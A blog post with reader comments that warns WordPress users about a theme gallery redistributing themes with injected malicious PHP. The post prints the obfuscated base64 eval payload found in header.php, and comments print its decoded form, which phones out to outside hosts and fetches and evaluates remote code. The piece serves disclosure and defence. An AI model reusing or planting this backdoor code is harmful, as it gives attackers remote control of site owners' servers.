Warning for new and existing WordPress users: DO NOT download WordPress themes from 3rd party "galleries". Identify the original source of the theme and download directly from the authors website.
As WordPress - both hosted and self-hosted - continues to enjoy explosive growth, exposure to malicious activity and code will increase. Sadly, this applies to both website administrators and visitors. In August I was disappointed to discover that WordPress and Joomla themes were being redistributed with malicious code; code which would track your own visitors or allow for random ads to be served. Since being exposed, the offending website has been taken down. Unfortunately, similar theme galleries have appeared with the same intent to redistribute themes with malicious code.
WP Sphere is distributed WordPress themes with malicious code
Alistair recently tipped me off to another WordPress gallery distributing themes which include malicious code / modifications. The tip from Alistair actually began as a support email:
I have one question about the encoded stuff I saw in the header, [...]
@eval(@base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\
iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\
QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\
M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj\
EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIj\
sgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OT\
cgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3OD\
M2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJF\
JEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgIC\
RSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cD\
ovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLm\
NvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waH\
A/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXS\
kgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0\
hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRT\
kwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNj\
U2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOU\
I3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQT\
gwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMz\
M1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRk\
U5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdX\
JsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG\
9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIE\
ByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMT\
E1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQk\
MzMDkxNik7′));
After kindly informing Alistair that my theme(s) were not distributed with any code outside of the WordPress scope, I discovered that the code in question was downloaded from WP Sphere. Poking through some of the other recognized themes on the site, I discovered that each of the themes made available for download had been repackaged to include the code above - often in plain view within the header.php file. Paul Carroll took the time to break down what the code above exposes users to.
I think the potential for abuse of this script is huge. I see it as a covert channel to setup Word Press enabled sites as thin zombies. The code being sent back to the server and eval’d could be a mailing script for spam or phishing.
If you have downloaded themes from WP Sphere or any other WordPress themes gallery, exercise caution and inspect the source code. If you are not code proficient, identify the original author and download the theme directly.
How do you police a non-policed platform?
The growth of a platform increases the virtual bulls-eye for malicious individuals to target. How do you protect WordPress users from download sites like WP Sphere or Template Browser? Alistair pointed out that WP Sphere was targeting users by purchasing Google AdWords to strengthen and increase the likelihood of attracting organic search engine traffic. How do you fight against such websites?
Only download 5ThirtyOne themes from 5thirtyone.com
I invite WordPress theme authors to make the same recommendation for their visitors - do not download themes from websites other than your own. Additionally, if you are a theme author and discover work being redistributed [without permission] with or without malicious code, contact the offending website host to request that content be taken down.
Unless a 5ThirtyOne theme was officially converted for use on a blogging platform other than WordPress, please download themes from nowhere else other than the links below:
If you’ve recommended WordPress to friends and family, please take the time to check or inform them of the dangers of downloading from free theme galleries. [Digg this]
64 Comments
Quote
it’s terrible!
i strong recommend you to inform the web hosting company to shut down the site.
Quote
I have always admired and appreciated your work in regards to Wordpress Themes and design, and to see that something like this is still on-going just completely blows my mind.
Did they not think they would ever get caught? Thanks for the heads-up. I’m definitely posting a note and linkback on my own site so that any visitors to me will also know about this.
If nothing else, I can at least help spread the word about the malicious nature of Sphere.
Quote
if you decode it, you get (assuming the wordpress comment system eats the following text):
if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen(”www.wpssr.com”, 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
$R50F5F9C80F12FFAE8B2400528E81B34E = “wpssr”;
elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen(”www.wpsnc.com”, 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
$R50F5F9C80F12FFAE8B2400528E81B34E = “wpsnc”;
else $R50F5F9C80F12FFAE8B2400528E81B34E = “wpsnc2″;
@eval(’$R14AF1BE9EE26A90921E64A82E7836797 = 1;’);
if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get(’allow_url_fopen’)) {
$RD3FE9C10A808A54EA2A3DBD9E605B696 = “1″;
$R6E4F14B335243BE656C65E3ED9E1B115 = “http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=”. urlencode($_SERVER['REQUEST_URI']) .”&”. “host=”. urlencode($_SERVER['HTTP_HOST']);
$R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115); @eval($R3E33E017CD76B9B7E6C7364FB91E2E90);
} else {
$RD3FE9C10A808A54EA2A3DBD9E605B696 = “0″;
$R6E4F14B335243BE656C65E3ED9E1B115 = “http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=”. urlencode($_SERVER['REQUEST_URI']) .”&”. “host=”. urlencode($_SERVER['HTTP_HOST']);
@readfile($R6E4F14B335243BE656C65E3ED9E1B115);
}
fclose($R37C014DAE5FE4FE5C77B6735ABC30916);
Quote
Maybe it’s time WordPress sets up an official theme repository similar to what they now do with plugins. I’m going to get the discussion going in WP-hackers.
Quote
@Ronald: Don’t they already have one? http://themes.wordpress.net/
Quote
@Andre: Yes, although they don’t really publicize it, and it’s more of an official unofficial directory. I’m thinking more in line of how they now handle plugins; having a submission process and using WordPress to check the central respiratory for theme updates (ensuring users download the original theme).
Quote
This is one of many reasons I prefer to build my themes from the ground up. Not only does it prevent the above but its really the best way to learn the ins and outs of wordpress. And originality is always a huge plus.
Quote
Got it to :
$R50F5F9C80F12FFAE8B2400528E81B34E.com => means ?
got this in the code : eval(base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7′));
that give :
if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen(”www.wpssr.com”, 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = “wpssr”; elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen(”www.wpsnc.com”, 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = “wpsnc”; else $R50F5F9C80F12FFAE8B2400528E81B34E = “wpsnc2″; @eval(’$R14AF1BE9EE26A90921E64A82E7836797 = 1;’); if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get(’allow_url_fopen’)) { $RD3FE9C10A808A54EA2A3DBD9E605B696 = “1″; $R6E4F14B335243BE656C65E3ED9E1B115 = “http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=”. urlencode($_SERVER['REQUEST_URI']) .”&”. “host=”. urlencode($_SERVER['HTTP_HOST']); $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115); @eval($R3E33E017CD76B9B7E6C7364FB91E2E90); } else { $RD3FE9C10A808A54EA2A3DBD9E605B696 = “0″; $R6E4F14B335243BE656C65E3ED9E1B115 = “http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=”. urlencode($_SERVER['REQUEST_URI']) .”&”. “host=”. urlencode($_SERVER['HTTP_HOST']); @readfile($R6E4F14B335243BE656C65E3ED9E1B115); } fclose($R37C014DAE5FE4FE5C77B6735ABC30916);
Quote
Good writeup of last night’s flurry of e-mails. Yep, the code uses the PHP Base64 functions to hide the PHP script, which, when run, executes arbitrary instructions on the machine running Wordpress — with the Wordpress account’s level of authority.
Since Wordpress makes it so easy to upload and try a theme (click a thumbnail!) there’s very little visibility into this kind of stuff. The uninitated would normally assume this code was something legitimate and leave it in.
Nasty stuff indeed. As you point out, any platform with sufficient reach becomes a target. When that platform is Internet-connected, it’s an even more appealing one.
Quote
themes.wordpress.net has been dead for months (you can download old themes, but you can’t upload new ones). It will almost certainly be replaced by Matt’s ‘theme marketplace’, in which all themes will be vetted before being made available to both .org users (for free) and .com users (for pay).
Of course, if you want to be included in that repository you’ll have to licence your themes as GPL, just as plugin authors are banned from uploading non-GPL code to the official plugin site.
Quote
This goes to prove the further you secure your network the better. The script doesn’t use the WordPress API (which is crap) so people behind proxies are happily safe.
Quote
Agreed with your post.
But this might be off-topic a little. But you think this theme is using your css much?
http://scarform.com/theme-viewer/index.php?wptheme=B3
Quote
About 2 weeks ago, there was a security-breach on the server I’m hosted at (hosting my own wordpress) and all folders that were chmod’ed to 777 had a .htaccess which redirected all requests to a likewise script that opened a connection to some server (not the one above though) in the same manner … maybe they got hacked too?
Quote
So thanks to help from Derek, Matt, and others, this issue’s getting a bit more visibility at GigaOm today (http://gigaom.com/2007/11/26/wordpress-themes-security-problems/) Matt seemed to think it was a pretty serious issue and both he and Derek suggested a theme “clearing house” as a way to check things out prior to them becoming adopted.
Quote
Just a little update. Most people in WP-hackers agree that a new theme repository is needed. One has been in the works, but this has sped up the processes.
We’re currently exploring the possibility of theme validation, so with a little luck, WordPress themes will be safer.
Quote
I should have followed up with Derek when I discovered this, but I got a little side tracked.
Thank you Alistair for getting this information out there.
Quote
Theme and plugin validation would be awesome. This is something that I touched base on with Alistair during our email exchanges:
"What can the WordPress community do? I think prevention is as simple as building a backend database; a network of trusted WordPress theme authors who apply for membership. Upon membership approval, each member receives a unique key (similar to an Akismet key) to be included in the header / footer of themes. Once a theme is uploaded to a users server, WordPress checks to verify the validity of the theme source before being activated under the Presentations tab. If a theme is not verifiable, a message will prompt users to investigate further before enabling. "
Quote
Good spotting Derek!
Thanks for bringing to everyone’s attention. I honestly prefer downloading/buying from the source if possible.
Quote
Thanks for your discovery and analysis, Derek.
Quote
And the next time a WP powered apple-blog is ‘hacked’ don’t give it a second thought… probably just another PR stunt.
Quote
One interesting thing is that I translated “Are Hackers Exploiting WordPress Themes?” which was writen by Alistair Croll into Chinese, then pasted it in one wordpress forums, but nobody believe that it is ture. poor! What I want to do is just share something with them and tell them to be careful, but, they don’t.
Thanx a lot for you analysis that I have learn something here.
Quote
An official repo for themes would be helpful. But we already have semi-official repos, and people still download from places like WP Sphere.
For an official repo to be really effective, Matt & Co. would have to build a theme viewer right into WordPress itself. That would keep most WP newbies from straying past the official stuff.
That being said, I put together a light weight "anti-spyware" plugin for WordPress. It scans a theme when you activate it for suspicious code. It then alerts the user, and asks them if they really want to activate the theme.
More @ http://headzoo.com/wp-anti-wares
Quote
I’ve downloaded themes from http://rock-kitty.net/ which have that same type of code.
I even e-mailed the site owner asking for “clean” copies of the files, but I never got a reply…
I’ve done some research on that type of code, and it’s seems a “legitim” way of encrypting information, but why use it on a wordpress theme?
Quote
I know, theres no point of using it on a wordpress theme, but it also effects the design as well.
So in by removing that, the design, fooks up. There for people who don’t know how to get around it, to have a link back to the proper theme owner and they;re text, they just leave it in there and dont touch it. Meaning the asshole that used this code to distribute these themes and call it they’re own are lame, and can advertise their sites more.
Quote
My hawaiian blog http://www.hawaiib.com was flaged by google because of one of the themes I used! well i removed the theme and hope they will remove the flag
if you go to google and type in hawaiib you will see something like "this site might harm your computer"
WTF!
hate those people that play around with the code, luckily I noticed where the problem is but it was too late!
Quote
Thanks to this post I was able to identify some bad coding in my theme. Thanks so much for informing us about this.
Quote
It’s nasty code - without getting into specifics, it will try to execute a file loaded from another server - which allows the other person to do ANYTHING on your site. And if that doesn’t work, it will try to display a file from the other site (which of course could be Javascript cross scripting code or you-know-what-kind of ads).
Quote
Well , its true that the wordpress theme making community is getting bigger and bigger and anything that is growing such rapidly its going to have its flaws. The main reason behind these encrypted code is because of theme sponsoring. Sponsoring?? , well as a wp theme designer my self , ive had a few sponsors my self, for my wordpress themes.
Many designers make wordpress themes just to get sponsors , ive seen many people making only one theme , changing the colors and the header making it a new theme ( so they say ) and get sponsors , the average sponsor link is worth $30-40 and a sponsored theme has 3-4 such links making a revenue of average 150$ / theme .
So i havnt explained the reason , well the 2 main conditions that are required for a theme to be sponsored by a sponsor are
1: Encrypted footers
2: Heavy promotion
Encripted footers:
As you may or i must say definitely have read this informative article , most of new wordpress themes contain such encrypted code. Whats behind them is links, yes in most cases and i am not justifying the acts of people who have done things in the above articles, but am saying that in this encrypted code are hidden sponsored links which the sponsors have paid for. So why do people encrypt the footers? well if you see some one honest using a free theme they dont remove the footer link as they know its someones hard work , but most of the people remove the links in the footer taking the credit them selves. So in a nut shell its basically done for sponsoring.
And as said in the article , you should download themes from sites of the theme makers or atleast download from a reputable themes gallery.
Have a nice day .
Ace.
Incoming Links
Leave a Reply